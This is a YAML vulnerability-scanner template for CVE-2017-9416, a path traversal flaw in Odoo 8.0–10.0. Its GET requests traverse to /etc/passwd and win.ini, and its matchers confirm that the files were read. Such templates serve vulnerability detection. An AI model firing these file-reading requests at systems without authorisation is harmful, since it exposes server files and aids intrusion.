43 lines
1.2 KiB
YAML
43 lines
1.2 KiB
YAML
id: CVE-2017-9416
|
|
|
|
info:
|
|
name: Odoo 8.0/9.0/10.0 - Path Traversal
|
|
author: Co5mos
|
|
severity: medium
|
|
description: |
|
|
Directory traversal vulnerability in tools.file_open in Odoo 8.0, 9.0, and 10.0 allows remote authenticated users to read arbitrary local files readable by the Odoo service.
|
|
reference:
|
|
- https://github.com/odoo/odoo/issues/17394
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-9416
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 6.5
|
|
cve-id: CVE-2017-9416
|
|
cwe-id: CWE-22
|
|
metadata:
|
|
verified: "true"
|
|
tags: cve,cve2017,odoo,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/base_import/static/c:/windows/win.ini"
|
|
- "{{BaseURL}}/base_import/static/etc/passwd"
|
|
|
|
stop-at-first-match: true
|
|
matchers-condition: or
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "regex('root:.*:0:0:', body)"
|
|
- "status_code == 200"
|
|
condition: and
|
|
|
|
- type: dsl
|
|
dsl:
|
|
- "contains(body, 'bit app support')"
|
|
- "contains(body, 'fonts')"
|
|
- "contains(body, 'extensions')"
|
|
- "status_code == 200"
|
|
condition: and
|